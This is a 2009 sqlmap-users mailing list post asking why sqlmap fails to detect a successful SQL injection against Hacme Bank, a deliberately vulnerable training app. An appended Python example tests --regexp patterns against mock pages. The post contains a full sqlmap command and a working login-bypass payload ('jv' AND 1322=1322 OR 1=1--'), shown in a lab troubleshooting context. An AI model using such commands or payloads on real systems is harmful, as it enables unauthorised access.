[sqlmap-users] sqlmap and Hacme Bank
From: Richard J. <wp...@gm...> - 2009-06-23 20:02:31
Hi all,

I've been playing with sqlmap against Foundstone's Hacme Bank and have been making some progress. Here is the command I've come up with:

./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx" --method=POST -p "txtUserName" --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false" --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit" -v 5 --prefix="'" --postfix=" OR 1=1--" --batch

I can confirm that this command is able to gain access to the HacmeBank site with this crafted string:

jv' AND 1322=1322 OR 1=1--

(Unicode decoded, of course). Some other crafted strings from sqlmap are successful as well. BUT, sqlmap doesn't seem to detect that it is successful in gaining access. I think the problem exists in the --regexp string... as in I can't find a regexp that works...

From the sqlmap docs, --regexp lets the user "provide a string which is *always* present on the not injected page *and* on all True injected query pages, but that it is *not* on the False ones". The problem I think I am running into is finding a string that is present on the not injected page, but not on the false pages. The strings that I have been trying to match are:

Not Injected Page: Message"></span>
True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span>
False Injected Page: Message">Invalid Login</span>

My question is: how is the "not injected" page detected? When watching the output on level 5 verbosity, I see this request. I assume this is the request to determine the "Not Injected" page?
[11:42:28] [INFO] testing if the provided regular expression matches within the target URL page content
[11:42:30] [TRAFFIC OUT] HTTP request:
POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
Content-length: 105
Accept-language: en-us,en;q=0.5
Connection: Keep-Alive
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.200.11:80
Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false
Content-type: application/x-www-form-urlencoded

__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit

This request sends in the POST data that I provided at the command line. This data causes an "Invalid Login" from the login page, which is exactly what happens when a False injected query occurs as well. In fact, the HTML that comes back from this "Not Injected" request is identical to the HTML that comes back from a False injected page.

So, in this situation, I feel that sqlmap isn't requesting the "Not Injected" page correctly. In my mind, that would involve a GET request, with no login data, to login.aspx, not a POST to that page. The GET should return a page that doesn't have the "Invalid Login" text that gets returned to a POST with invalid credentials.

So, can I get sqlmap to detect the "Not Injected" page with a simple GET request, but then perform the SQL injection using POST requests? Or is there something else that needs to be done? I tried changing --method to GET, as well as removing --method, but the GET that is sent for the "Not Injected" page still contains the POST data, which still results in "Invalid Login". Or am I confused about how this should work?

Thanks!
Richard
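The three-way comparison that the --regexp documentation describes, written out as an added example (this is not sqlmap's code and not part of the post). It uses constructed page bodies modelled on the three span fragments quoted above, with a hypothetical `id="Message"` span and wrapper HTML, and assumes that sqlmap evaluates --regexp with Python's `re` module. It shows two things the post does not: the empty-span pattern fails the True-page condition even when the baseline is a clean form, because the True page carries an error message inside the same span, and a pattern that anchors on the span opening while excluding the failed-login text satisfies all three conditions, but only if the baseline is the form without "Invalid Login". Whether sqlmap's baseline request is a GET or a POST is left as the open question the post raises.

```python
import re

# Constructed response bodies (not captured from Hacme Bank), modelled on the
# three fragments quoted in the post. Only the message span differs.
TEMPLATE = '<html><body><form><span id="Message">{msg}</span></form></body></html>'

PAGE_FORM_ONLY = TEMPLATE.format(msg="")                                  # clean login form, e.g. from a GET
PAGE_TRUE = TEMPLATE.format(msg="Line 1: Incorrect syntax near 'asdf'.")  # True injected query
PAGE_FALSE = TEMPLATE.format(msg="Invalid Login")                         # False injected query
PAGE_BAD_CREDS = PAGE_FALSE  # a POST with wrong credentials returns the same body as a False page


def regexp_discriminates(pattern: str, not_injected: str, true_page: str, false_page: str) -> bool:
    """The documented --regexp contract: the pattern must match the not-injected
    page and the True page, and must not match the False page."""
    rx = re.compile(pattern)
    return (rx.search(not_injected) is not None
            and rx.search(true_page) is not None
            and rx.search(false_page) is None)


def classify_response(pattern: str, page: str) -> str:
    """Boolean-based blind logic once a valid pattern is known: an injected
    response is True when the pattern is present and False when it is absent."""
    return "True" if re.search(pattern, page) else "False"


# Candidate patterns: the one the post tries, a negative-lookahead variant that
# excludes the failed-login text, and one that can never work.
CANDIDATES = [
    r'Message"></span>',
    r'Message">(?!Invalid Login)',
    r'Invalid Login',
]


def evaluate_candidates(not_injected: str) -> dict:
    """Check every candidate against a given baseline; returns {pattern: usable}."""
    return {p: regexp_discriminates(p, not_injected, PAGE_TRUE, PAGE_FALSE) for p in CANDIDATES}


if __name__ == "__main__":
    print("baseline = POST with bad credentials:", evaluate_candidates(PAGE_BAD_CREDS))
    print("baseline = clean login form:        ", evaluate_candidates(PAGE_FORM_ONLY))
    good = r'Message">(?!Invalid Login)'
    for name, page in (("True page", PAGE_TRUE), ("False page", PAGE_FALSE)):
        print(name, "->", classify_response(good, page))
```

Running it with the POST-derived baseline rejects every candidate, which is the situation the post describes; with the clean-form baseline, only the negative-lookahead pattern passes, and it then classifies the True and False pages correctly.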